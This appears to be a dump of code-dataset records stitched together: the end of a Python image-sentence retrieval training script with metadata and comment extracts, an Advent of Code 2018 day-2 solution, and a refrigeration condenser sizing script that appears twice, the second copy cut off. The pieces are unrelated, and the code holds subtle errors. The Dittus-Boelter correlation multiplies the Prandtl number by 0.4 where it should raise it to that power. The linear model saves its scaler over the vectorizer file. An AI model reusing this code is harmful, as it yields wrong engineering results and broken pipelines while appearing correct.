parser.add_argument('--extract_embeddings', dest='extract_embeddings', action='store_true', help='Extract embeddings from trained model') parser.add_argument('--project_words', dest='project_words', action='store_true', help='Project words from vocabulary to visual space') parser.add_argument('--model', dest='model', default='model.dat.gz', help='Path to write model to') parser.add_argument('--model_type', dest='model_type', default='simple', help='Type of model: (linear, simple, shared_embeddings, shared_all)') parser.add_argument('--character', dest='character', action='store_true', help='Character-level model') 
parser.add_argument('--zero_shot', dest='zero_shot', action='store_true', help='Disable visual signal for sentences containing words in zero_shot.pkl.gz') parser.add_argument('--tokenizer', dest='tokenizer', default='tok.pkl.gz', help='Path to write tokenizer to') parser.add_argument('--init_model', dest='init_model', default=None, help='Initialize model weights with model from given path') parser.add_argument('--init_tokenizer', dest='init_tokenizer', default=None, help='Use tokenizer from given path') parser.add_argument('--iter_predict', type=int, help='Model after that many iterations will be used to predict') parser.add_argument('--scramble', action='store_true', help='Scramble words in a test sentence') parser.add_argument('--distance', default='cosine', help='Distance metric to rank images') parser.add_argument('--dataset', dest='dataset', default='flickr8k', help='Dataset: flick8k, flickr30k, coco') parser.add_argument('--hidden_size', dest='hidden_size', type=int, default=256, help='size of the hidden layer') parser.add_argument('--embedding_size', dest='embedding_size', type=int, default=None, help='size of (word) embeddings') parser.add_argument('--hidden_type', default='gru', help='recurrent layer type: gru, lstm') parser.add_argument('--activation', default='tanh', help='activation of the hidden layer units') parser.add_argument('--out_activation', default='linear', help='Activation of output units') parser.add_argument('--cost', default='MeanSquaredError', help='Image prediction cost function') parser.add_argument('--scaler', dest='scaler', default='none', help='Method to scale targets (none, standard)') parser.add_argument('--rate', dest='rate', type=float, default=0.0002, help='Learning rate') parser.add_argument('--clipnorm', dest='clipnorm', type=float, default=0.0, help='Gradients with norm larger than clipnorm will be scaled') parser.add_argument('--alpha', dest='alpha', type=float, default=0.0, help='Interpolation parameter for LM cost vs image 
cost') parser.add_argument('--ridge_alpha', dest='ridge_alpha', type=float, default=1.0, help='Regularization for linear regression model') parser.add_argument('--non_interpolated', dest='non_interpolated', action='store_true', help='Use non-interpolated cost') parser.add_argument('--iterations', dest='iterations', type=int, default=10, help='Number of training iterations') parser.add_argument('--word_freq_threshold', dest='word_freq_threshold', type=int, default=10, help='Map words below this threshold to UNK') parser.add_argument('--shuffle', dest='shuffle', action='store_true', help='Shuffle training data') parser.add_argument('--random_seed', dest='random_seed', default=None, type=int, help='Random seed') parser.add_argument('--snapshot_freq', dest='snapshot_freq', type=int, default=5, help='How many iterations to save model') parser.add_argument('--batch_size', dest='batch_size', type=int, default=64, help='Batch size') args = parser.parse_args() if args.random_seed is not None: numpy.random.seed(args.random_seed) if args.project_words: project_words(args) elif args.predict and args.model_type == 'linear': test_linear(args) elif args.predict and args.model_type != 'linear': test(args) elif args.extract_embeddings: extract_embeddings(args) elif args.model_type == 'linear': train_linear(args) else: train(args) def train_linear(args): p = dp.getDataProvider(args.dataset) data = list(p.iterImageSentencePair(split='train')) texts = [ pair['sentence']['raw'] for pair in data ] images = [ pair['image']['feat'] for pair in data ] analyzer = 'char' if args.character else 'word' vectorizer = CountVectorizer(min_df=args.word_freq_threshold, analyzer=analyzer, lowercase=True, ngram_range=(1,1)) X = vectorizer.fit_transform(texts) scaler = StandardScaler() if args.scaler == 'standard' else NoScaler() sys.stderr.write("BOW computed\n") Y = scaler.fit_transform(numpy.array(images)) model = Ridge(solver='lsqr', alpha=args.ridge_alpha) sys.stderr.write("Starting training\n") 
model.fit(X,Y) sys.stderr.write("Saving model\n") cPickle.dump(model, gzip.open('model.dat.gz','w')) cPickle.dump(vectorizer, gzip.open('vec.pkl.gz','w')) cPickle.dump(scaler, gzip.open('vec.pkl.gz', 'w')) def test_linear(args): if args.random_seed is not None: numpy.random.seed(args.random_seed) D = Cdist() model = cPickle.load(gzip.open('model.dat.gz')) vectorizer = cPickle.load(gzip.open('vec.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) real_stdout = sys.stdout with open('/dev/null', 'w') as f: sys.stdout = f d = dp.getDataProvider(args.dataset) sys.stdout = real_stdout pairs = list(d.iterImageSentencePair(split='val')) texts = [ pair['sentence']['raw'] for pair in pairs ] images = list(d.iterImages(split='val')) # With pairs we'd get duplicate images! X = vectorizer.transform(texts) Y_pred = numpy.asarray(model.predict(X), dtype='float32') # candidates are identical to Y_pred if args.paraphrase: #distances = D.cosine_distance(Y_pred, Y_pred) distances = cdist(Y_pred, Y_pred, metric='cosine') N = 0 score = 0.0 for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) top4 = sum([ imgid == pairs[b]['sentence']['imgid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4]) # exclude self score = score + top4/4.0 N = N+1 print args.iter_predict, N, score/N else: Y = numpy.array([ image['feat'] for image in images], dtype='float32') distances = D.cosine_distance(Y_pred, Y) errors = 0 N = 0 for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] best = numpy.argsort(row) top5 = [ images[b]['imgid'] for b in best[:5] ] N = N+1 if imgid not in top5: errors = errors + 1 print errors, N, errors/N def train(args): zero_words = cPickle.load(gzip.open("zero_shot.pkl.gz")) if args.zero_shot else set() def maybe_zero(s, i): overlap = set(tokenize(s)).intersection(zero_words) if args.zero_shot and len(overlap) > 0: return numpy.zeros(i.shape) else: 
return i dataset = args.dataset tok_path = args.tokenizer model_path = args.model d = dp.getDataProvider(dataset) pairs = list(d.iterImageSentencePair(split='train')) if args.shuffle: numpy.random.shuffle(pairs) output_size = len(pairs[0]['image']['feat']) embedding_size = args.embedding_size if args.embedding_size is not None else args.hidden_size tokenizer = cPickle.load(gzip.open(args.init_tokenizer)) \ if args.init_tokenizer else Tokenizer(min_df=args.word_freq_threshold, character=args.character) sentences, images = zip(*[ (pair['sentence']['raw'], maybe_zero(pair['sentence']['raw'],pair['image']['feat'])) for pair in pairs ]) scaler = StandardScaler() if args.scaler == 'standard' else NoScaler() images = scaler.fit_transform(images) tokens = [ [tokenizer.encoder['PAD']] + sent + [tokenizer.encoder['END'] ] for sent in tokenizer.fit_transform(sentences) ] tokens_inp = [ token[:-1] for token in tokens ] tokens_out = [ token[1:] for token in tokens ] cPickle.dump(tokenizer, gzip.open(tok_path, 'w')) cPickle.dump(scaler, gzip.open('scaler.pkl.gz','w')) # Validation data valid_pairs = list(d.iterImageSentencePair(split='val')) valid_sents, valid_images = zip(*[ (pair['sentence']['raw'], pair['image']['feat']) for pair in valid_pairs ]) valid_images = scaler.transform(valid_images) valid_tokens = [ [ tokenizer.encoder['PAD'] ] + sent + [tokenizer.encoder['END'] ] for sent in tokenizer.transform(valid_sents) ] valid_tokens_inp = [ token[:-1] for token in valid_tokens ] valid_tokens_out = [ token[1:] for token in valid_tokens ] valid = (valid_tokens_inp, valid_tokens_out, valid_images) updater = passage.updates.Adam(lr=args.rate, clipnorm=args.clipnorm) if args.cost == 'MeanSquaredError': z_cost = MeanSquaredError elif args.cost == 'CosineDistance': z_cost = CosineDistance else: raise ValueError("Unknown cost") if args.hidden_type == 'gru': Recurrent = GatedRecurrent elif args.hidden_type == 'lstm': Recurrent = LstmRecurrent else: Recurrent = GatedRecurrent # if 
args.init_model is not None: # model_init = cPickle.load(open(args.init_model)) # def values(ps): # return [ p.get_value() for p in ps ] # # FIXME enable this for shared only embeddings # layers = [ Embedding(size=args.hidden_size, n_features=tokenizer.n_features, # weights=values(model_init.layers[0].params)), # Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation, # weights=values(model_init.layers[1].params)), # Combined(left=Dense(size=tokenizer.n_features, activation='softmax', reshape=True, # weights=values(model_init.layers[2].left.params)), # right=Dense(size=output_size, activation=args.out_activation, # weights=values(model_init.layers[2].right.params)) # ) ] # else: # FIXME implement proper pretraining FIXME interpolated = True if not args.non_interpolated else False if args.model_type in ['add', 'mult', 'matrix']: if args.model_type == 'add': layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=Add) elif args.model_type == 'mult': layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=Mult) elif args.model_type == 'matrix': sqrt_size = embedding_size ** 0.5 if not sqrt_size.is_integer(): raise ValueError("Sqrt of embedding_size not integral for matrix model") layer0 = Direct(size=embedding_size, n_features=tokenizer.n_features, op=MatrixMult) layers = [ layer0, Dense(size=output_size, activation=args.out_activation, reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) elif args.model_type == 'simple': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, 
reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) # FIXME need validation elif args.model_type == 'deep-simple': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation), Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, reshape=False) ] valid = (valid_tokens_inp, valid_images) model = RNN(layers=layers, updater=updater, cost=z_cost, iterator=SortedPadded(shuffle=False), verbose=1) model.fit(tokens_inp, images, n_epochs=args.iterations, batch_size=args.batch_size, len_filter=None, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) # FIXME need validation elif args.model_type == 'shared_all': if args.zero_shot: raise NotImplementedError # FIXME zero_shot not implemented layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation), Combined(left=Dense(size=tokenizer.n_features, activation='softmax', reshape=True), right=Dense(size=output_size, activation=args.out_activation, reshape=False)) ] model = ForkedRNN(layers=layers, updater=updater, cost_y=CategoricalCrossEntropySwapped, cost_z=z_cost, alpha=args.alpha, size_y=tokenizer.n_features, verbose=1, interpolated=interpolated) model.fit(tokens_inp, tokens_out, images, n_epochs=args.iterations, batch_size=args.batch_size, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) elif args.model_type == 'shared_embeddings': layers = [ Embedding(size=embedding_size, n_features=tokenizer.n_features), Combined(left=Stacked([Recurrent(seq_output=True, 
size=args.hidden_size, activation=args.activation), Dense(size=tokenizer.n_features, activation='softmax', reshape=True)]), left_type='id', right=Stacked([Recurrent(seq_output=False, size=args.hidden_size, activation=args.activation), Dense(size=output_size, activation=args.out_activation, reshape=False)]), right_type='id') ] model = ForkedRNN(layers=layers, updater=updater, cost_y=CategoricalCrossEntropySwapped, cost_z=z_cost, alpha=args.alpha, size_y=tokenizer.n_features, verbose=1, interpolated=interpolated, zero_shot=args.zero_shot) model.fit(tokens_inp, tokens_out, images, n_epochs=args.iterations, batch_size=args.batch_size, snapshot_freq=args.snapshot_freq, path=model_path, valid=valid) cPickle.dump(model, gzip.open(model_path,"w")) def test(args): if args.random_seed is not None: numpy.random.seed(args.random_seed) def scramble(words): ixs = range(len(words)) random.shuffle(ixs) return [ words[ix] for ix in ixs ] testInfo = {'argv': sys.argv, 'dataset': args.dataset, 'scramble': args.scramble, 'model_type': args.model_type, 'alpha': args.alpha, 'iter_predict': args.iter_predict, 'task': 'paraphrase' if args.paraphrase else 'image', 'items': []} D = Cdist() dataset = args.dataset suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) real_stdout = sys.stdout with open('/dev/null', 'w') as f: sys.stdout = f d = dp.getDataProvider(args.dataset) sys.stdout = real_stdout pairs = list(d.iterImageSentencePair(split='val')) inputs = [ scramble(s) if args.scramble else s for s in tokenizer.transform([ pair['sentence']['raw'] for pair in pairs]) ] if args.paraphrase: candidates = tokenizer.transform([ pair['sentence']['raw'] for pair in pairs]) # No scrambling of candidates if args.paraphrase_state == 'output_vis': preds = model.predict(inputs) candidates_pred = model.predict(candidates) 
elif args.paraphrase_state == 'hidden_text': preds, _ = predict_h(model, inputs) candidates_pred, _ = predict_h(model, candidates) elif args.paraphrase_state == 'hidden_vis' and hasattr(model.layers[1], 'left'): _, preds = predict_h(model, inputs) _, candidates_pred = predict_h(model, candidates) elif args.paraphrase_state == 'hidden_vis' and not hasattr(model.layers[1], 'left'): preds = predict_h_simple(model, inputs) candidates_pred = predict_h_simple(model, candidates) elif args.paraphrase_state == 'hidden_multi': preds = numpy.hstack(predict_h(model, inputs)) candidates_pred = numpy.hstack(predict_h(model, candidates)) else: raise ValueError("Unknown state") distances = D.cosine_distance(preds, candidates_pred) #distances = cdist(preds, candidates_pred, metric='cosine') N = 0 score = 0.0 imgids = numpy.array([ pair['sentence']['imgid'] for pair in pairs ]) sentids = numpy.array([ pair['sentence']['sentid'] for pair in pairs]) for j,row in enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) rank = numpy.where((imgids[best] == imgid) * (sentids[best] != sentid))[0][0] + 1 top4 = [ pairs[b]['sentence']['imgid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4] # exclude self top4sent = [ pairs[b]['sentence']['sentid'] for b in best[0:5] if sentid != pairs[b]['sentence']['sentid'] ][0:4] score = score + sum([i == imgid for i in top4 ])/4.0 N = N+1 itemInfo = {'sentid':sentid, 'imgid': imgid, 'score': sum([i == imgid for i in top4 ])/4.0, 'rank': rank, 'topn': top4 , 'topnsentid': top4sent, 'input': tokenizer.inverse_transform([inputs[j]])[0]} testInfo['items'].append(itemInfo) print args.iter_predict, N, score/N else: preds = model.predict(inputs) images = list(d.iterImages(split='val')) distances = D.cosine_distance(preds, scaler.transform([image['feat'] for image in images ])) errors = 0 N = 0 imgids = numpy.array([ img['imgid'] for img in images ]) for j,row in 
enumerate(distances): imgid = pairs[j]['sentence']['imgid'] sentid = pairs[j]['sentence']['sentid'] best = numpy.argsort(row) rank = numpy.where(imgids[best] == imgid)[0][0] + 1 top5 = [ images[b]['imgid'] for b in best[:5] ] N = N+1 if imgid not in top5: errors = errors + 1 itemInfo = {'sentid':sentid, 'imgid': imgid, 'score': float(imgid in top5), 'rank': rank, 'topn': top5, 'input':tokenizer.inverse_transform([inputs[j]])[0] } testInfo['items'].append(itemInfo) print args.iter_predict, errors, N, errors/N testInfoPath = 'testInfo-task={0}-scramble={1}-iter_predict={2}.json.gz'.format(testInfo['task'], testInfo['scramble'], testInfo['iter_predict']) json.dump(testInfo, gzip.open(testInfoPath,'w')) def project_words(args): suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) scaler = cPickle.load(gzip.open('scaler.pkl.gz')) exclude = ['PAD','END','UNK'] words, indexes = zip(*[ (w,i) for (w,i) in tokenizer.encoder.iteritems() if w not in exclude ]) inputs = [ [tokenizer.encoder['PAD'], i, tokenizer.encoder['END']] for i in indexes ] # FIXME actually for training we don't have END preds = scaler.inverse_transform(model.predict(inputs)) proj = dict((words[i], preds[i]) for i in range(0, len(words))) cPickle.dump(proj, gzip.open("proj.pkl.gz" + suffix, "w")) def extract_embeddings(args): tokenizer = cPickle.load(gzip.open('tok.pkl.gz')) #scaler = cPickle.load(open('scaler.pkl')) suffix = '' if args.iter_predict is None else ".{0}".format(args.iter_predict) model = cPickle.load(gzip.open('model.dat.gz' + suffix)) embeddings = model.layers[0].params[0].get_value() table = dict((word, embeddings[i]) for i,word in tokenizer.decoder.iteritems() if word not in ['END','PAD','UNK'] ) cPickle.dump(table, gzip.open('embeddings.pkl.gz' + suffix, 'w')) class Cdist(): def __init__(self): self.U = T.matrix('U') self.V = T.matrix('V') self.U_norm = 
self.U / self.U.norm(2, axis=1).reshape((self.U.shape[0], 1)) self.V_norm = self.V / self.V.norm(2, axis=1).reshape((self.V.shape[0], 1)) self.W = T.dot(self.U_norm, self.V_norm.T) self.cosine = theano.function([self.U, self.V], self.W) def cosine_distance(self, A, B): return 1 - self.cosine(A, B) main()
en
0.501562
#!/usr/bin/env python #, Dense # With pairs we'd get duplicate images! # candidates are identical to Y_pred #distances = D.cosine_distance(Y_pred, Y_pred) # exclude self # Validation data # if args.init_model is not None: # model_init = cPickle.load(open(args.init_model)) # def values(ps): # return [ p.get_value() for p in ps ] # # FIXME enable this for shared only embeddings # layers = [ Embedding(size=args.hidden_size, n_features=tokenizer.n_features, # weights=values(model_init.layers[0].params)), # Recurrent(seq_output=True, size=args.hidden_size, activation=args.activation, # weights=values(model_init.layers[1].params)), # Combined(left=Dense(size=tokenizer.n_features, activation='softmax', reshape=True, # weights=values(model_init.layers[2].left.params)), # right=Dense(size=output_size, activation=args.out_activation, # weights=values(model_init.layers[2].right.params)) # ) ] # else: # FIXME implement proper pretraining FIXME # FIXME need validation # FIXME need validation # FIXME zero_shot not implemented # No scrambling of candidates #distances = cdist(preds, candidates_pred, metric='cosine') # exclude self # FIXME actually for training we don't have END #scaler = cPickle.load(open('scaler.pkl'))
1.973251
2
2018/day-02/day2.py
smolsbs/aoc
1
6623585
<reponame>smolsbs/aoc<filename>2018/day-02/day2.py<gh_stars>1-10 import sys import itertools with open('input', 'r') as fp: data = [x.strip('\n') for x in fp.readlines()] def part1(data): a, b = 0, 0 for line in data: s = {} for ch in line: if ch not in s: s[ch] = 1 else: s[ch] += 1 if 2 in s.values(): a +=1 if 3 in s.values(): b += 1 return a*b def part2(data): combs = list(itertools.combinations(data, 2)) ssize = len(combs[0][0]) # length of any string for c in combs: common = "" diff = 0 for i in range(ssize): if c[0][i] == c[1][i]: common += c[0][i] else: diff +=1 if diff > 1: break if diff == 1: return common print(part1(data)) print(part2(data))
import sys import itertools with open('input', 'r') as fp: data = [x.strip('\n') for x in fp.readlines()] def part1(data): a, b = 0, 0 for line in data: s = {} for ch in line: if ch not in s: s[ch] = 1 else: s[ch] += 1 if 2 in s.values(): a +=1 if 3 in s.values(): b += 1 return a*b def part2(data): combs = list(itertools.combinations(data, 2)) ssize = len(combs[0][0]) # length of any string for c in combs: common = "" diff = 0 for i in range(ssize): if c[0][i] == c[1][i]: common += c[0][i] else: diff +=1 if diff > 1: break if diff == 1: return common print(part1(data)) print(part2(data))
en
0.393049
# length of any string
3.11987
3
Condenser_Designer.py
li-fulin/Refrigeration-Condenser-Desginer
0
6623586
import CoolProp.CoolProp as CP import numpy as np import matplotlib.pyplot as plt import pandas as pd # Constant Parameters RC = 80 #kW Tevap = 5 #Degree Celsius Tcond = 45 #Degree Celsius Twi = 30 #Water inlet temp; Degree Celsius Twe = 35 #Water outlet temp; Degree Celsius Do = 0.016 #Pipe outer diameter; m Di = 0.014 #Pipe inner diameter; m HRR = 1.27 #Heat Rejection Ratio; Qcond/Qevap k_pipe = 390 #Thermal conductivity of copper; J/mK N = 42 #number of pipes Pass = 2 #number of pass refrigerant = 'R134a' #refrigerant V_flow = 13 #Number of vertical flow # Iteration Variable delta_T = 5 #Assumed delta T T_array = np.arange(35.01,45.01,0.01) #Array of Condenser Temperature T = np.flip(T_array) #Flipped Condenser Array def Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant): ''' This function computes the actual temperature difference and the condenser tube length given condenser temperature as input Parameters: Tevap - Evaporator Temperature Tcond - Condenser Temperature Twi - Water inlet Temperature Twe - Water outlet Temperature Do - Pipe outer diameter Di - Pipe inner diameter HRR - Heat Rejection Ratio k_pipe - Pipe thermal conductivity N - Number of pipes Pass - Number of Bends + 1 V_flow - Number of fluid flow perpendicular to pipe delta_T - Temperature Difference refrigerant - Name of the Refrigerant Return: delta_T_prime - Converged Temperature Difference L_tube - Condenser Tube Length Pcond - Condenser Pressure ''' # Refrigerant Side Tcond_K = Tcond +273.15 #Kelvin Pcond = CP.PropsSI('P','T',Tcond_K,'Q',0,refrigerant)/1000 #@Tcond and Q=0; kPa N_effective = (N/V_flow) k_ref = CP.PropsSI('CONDUCTIVITY','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 rho_ref = CP.PropsSI('D','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 hfg = CP.PropsSI('H','T',Tcond_K,'Q',1,refrigerant) - CP.PropsSI('H','T',Tcond_K,'Q',0,refrigerant) #J/kg mu_ref = CP.PropsSI('V','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 Numerator = 
(k_ref**3)*(rho_ref**2)*9.81*hfg Denominator = (N_effective*mu_ref*delta_T*Do) h_refrigerant = 0.725*((Numerator/Denominator)**0.25) # Conduction in pipe delta_x = (Do-Di)/2 h_pipe = delta_x/k_pipe # Fouling Factor h_fouling = 0.000176 # Convection in Water T_bulkmean = (Twi+Twe)/2 #Degree Celsius T_bulkmean_K = T_bulkmean + 273.15 #Kelvin P_water = 101325 #Pascal Cp_water = CP.PropsSI('C','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water k_water = CP.PropsSI('CONDUCTIVITY','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water mu_water = CP.PropsSI('V','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water rho_water = CP.PropsSI('D','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water Q_cond = HRR*RC*1000 #Heat Rejection m_water = Q_cond/(Cp_water*(Twe-Twi)) #Total mass flow rate m_pipe = m_water/(N/Pass) #mass flow per pipe U = m_pipe/(rho_water*(np.pi*(Di**2)*0.25)) #Flow rate/ Flow velocity h_water = Dittus_Boelter(Di,k_water,U,rho_water,mu_water,Cp_water) #Enthalpy Water # Heat calculation R_refrigerant = 1/(h_refrigerant*np.pi*Do) #Thermal Resistance for Refrigerant; 1/(hA) R_pipe = (h_pipe)/(np.pi*(0.5*(Do+Di))) #Thermal Resistance for Pipe; delta x/(kA) R_fouling = h_fouling/(np.pi*Di) #Thermal Resistance for Fouling Factor; 1/(hA) R_water = 1/(h_water*np.pi*Di) #Thermal Resistance for Water; 1/(hA) R_total = R_refrigerant+R_pipe+R_fouling+R_water #Totla Thermal Resistance LMTD = ((Tcond-Twe)-(Tcond-Twi))/np.log((Tcond-Twe)/(Tcond-Twi)) #Log Mean Temperature Difference L_total = (Q_cond*R_total)/LMTD #Total condenser length L_tube = L_total/N #Length per tube delta_T_prime = Q_cond/(h_refrigerant*np.pi*Do*L_tube*N) #New delta T # print to debug ''' print(f'h refrigerant: {h_refrigerant}') print(f'h pipe: {h_pipe}') print(f'h fouling: {h_fouling}') print(f'h water: {h_water}') print(f'mass flow: {m_water}') print(f'Delta T: {delta_T_prime}') print(f'Total Length: {L_total}') print(f'Length per tube: {L_tube}\n') ''' return 
delta_T_prime, L_tube, Pcond def Dittus_Boelter(Di,k_water,U,rho,mu_water,Cp_water): ''' This is the Dittus-Boelter Equation used to relate water enthalpy Nu = K*(Re**m)*(Pr**n) Parameters: Di - Pipe inner diameter k_water - Fluid thermal conductivity U - Fluid flow rate rho - Fluid Density mu_water - Fluid viscosity Cp_water - Constant pressure specific heat Return: h_water - Fluid enthalpy''' Re = (Di*U*rho/mu_water) #Reynold's Number Pr = ((Cp_water*mu_water)/k_water) #Prandlt Number Nu = 0.023*((Re**0.8)*(Pr*0.4)) #Nusselt Number return (k_water*Nu)/Di def iterator(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant): ''' This function iterates until the temperature difference converge with 1% error ''' Dt, L_tube, Pcond = Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) tolerance = 0.01 max_iter = 1000 counter = 0 while counter < max_iter: if abs(Dt-delta_T) > tolerance: counter += 1 delta_T = Dt Dt, L_tube, Pcond = Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) else: break return Pcond, L_tube, Dt P = [] #List for Pressure L = [] #List for Tube Lengths DT =[] #list for temperature difference for t in T: p, l, dt= iterator(Tevap, t, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) P.append(p) L.append(l) DT.append(dt) title = refrigerant+' Condenser Pressure vs Condenser Tube Length' #Plot title data = {'Condenser Temperature (C)':T, 'Condenser Pressure (kPa)':P, 'Condenser Tube Length (m)':L, 'Temperature Difference':DT} df = pd.DataFrame(data) # Exporting data to csv file filename = refrigerant + ' Tube Length Data.csv' #CSV file name df.to_csv(filename, index=False) # Plotting the data plt.plot(L,P) plt.xlabel('Condenser Tube Length (m)') plt.ylabel('Condenser Pressure (kPa)') plt.title(title) plt.show()
import CoolProp.CoolProp as CP import numpy as np import matplotlib.pyplot as plt import pandas as pd # Constant Parameters RC = 80 #kW Tevap = 5 #Degree Celsius Tcond = 45 #Degree Celsius Twi = 30 #Water inlet temp; Degree Celsius Twe = 35 #Water outlet temp; Degree Celsius Do = 0.016 #Pipe outer diameter; m Di = 0.014 #Pipe inner diameter; m HRR = 1.27 #Heat Rejection Ratio; Qcond/Qevap k_pipe = 390 #Thermal conductivity of copper; J/mK N = 42 #number of pipes Pass = 2 #number of pass refrigerant = 'R134a' #refrigerant V_flow = 13 #Number of vertical flow # Iteration Variable delta_T = 5 #Assumed delta T T_array = np.arange(35.01,45.01,0.01) #Array of Condenser Temperature T = np.flip(T_array) #Flipped Condenser Array def Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant): ''' This function computes the actual temperature difference and the condenser tube length given condenser temperature as input Parameters: Tevap - Evaporator Temperature Tcond - Condenser Temperature Twi - Water inlet Temperature Twe - Water outlet Temperature Do - Pipe outer diameter Di - Pipe inner diameter HRR - Heat Rejection Ratio k_pipe - Pipe thermal conductivity N - Number of pipes Pass - Number of Bends + 1 V_flow - Number of fluid flow perpendicular to pipe delta_T - Temperature Difference refrigerant - Name of the Refrigerant Return: delta_T_prime - Converged Temperature Difference L_tube - Condenser Tube Length Pcond - Condenser Pressure ''' # Refrigerant Side Tcond_K = Tcond +273.15 #Kelvin Pcond = CP.PropsSI('P','T',Tcond_K,'Q',0,refrigerant)/1000 #@Tcond and Q=0; kPa N_effective = (N/V_flow) k_ref = CP.PropsSI('CONDUCTIVITY','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 rho_ref = CP.PropsSI('D','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 hfg = CP.PropsSI('H','T',Tcond_K,'Q',1,refrigerant) - CP.PropsSI('H','T',Tcond_K,'Q',0,refrigerant) #J/kg mu_ref = CP.PropsSI('V','T',Tcond_K,'Q',0,refrigerant) #@Tcond and Q=0 Numerator = 
(k_ref**3)*(rho_ref**2)*9.81*hfg Denominator = (N_effective*mu_ref*delta_T*Do) h_refrigerant = 0.725*((Numerator/Denominator)**0.25) # Conduction in pipe delta_x = (Do-Di)/2 h_pipe = delta_x/k_pipe # Fouling Factor h_fouling = 0.000176 # Convection in Water T_bulkmean = (Twi+Twe)/2 #Degree Celsius T_bulkmean_K = T_bulkmean + 273.15 #Kelvin P_water = 101325 #Pascal Cp_water = CP.PropsSI('C','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water k_water = CP.PropsSI('CONDUCTIVITY','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water mu_water = CP.PropsSI('V','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water rho_water = CP.PropsSI('D','T',T_bulkmean_K,'P',P_water,'water') #@Tbulkmean and P water Q_cond = HRR*RC*1000 #Heat Rejection m_water = Q_cond/(Cp_water*(Twe-Twi)) #Total mass flow rate m_pipe = m_water/(N/Pass) #mass flow per pipe U = m_pipe/(rho_water*(np.pi*(Di**2)*0.25)) #Flow rate/ Flow velocity h_water = Dittus_Boelter(Di,k_water,U,rho_water,mu_water,Cp_water) #Enthalpy Water # Heat calculation R_refrigerant = 1/(h_refrigerant*np.pi*Do) #Thermal Resistance for Refrigerant; 1/(hA) R_pipe = (h_pipe)/(np.pi*(0.5*(Do+Di))) #Thermal Resistance for Pipe; delta x/(kA) R_fouling = h_fouling/(np.pi*Di) #Thermal Resistance for Fouling Factor; 1/(hA) R_water = 1/(h_water*np.pi*Di) #Thermal Resistance for Water; 1/(hA) R_total = R_refrigerant+R_pipe+R_fouling+R_water #Totla Thermal Resistance LMTD = ((Tcond-Twe)-(Tcond-Twi))/np.log((Tcond-Twe)/(Tcond-Twi)) #Log Mean Temperature Difference L_total = (Q_cond*R_total)/LMTD #Total condenser length L_tube = L_total/N #Length per tube delta_T_prime = Q_cond/(h_refrigerant*np.pi*Do*L_tube*N) #New delta T # print to debug ''' print(f'h refrigerant: {h_refrigerant}') print(f'h pipe: {h_pipe}') print(f'h fouling: {h_fouling}') print(f'h water: {h_water}') print(f'mass flow: {m_water}') print(f'Delta T: {delta_T_prime}') print(f'Total Length: {L_total}') print(f'Length per tube: {L_tube}\n') ''' return 
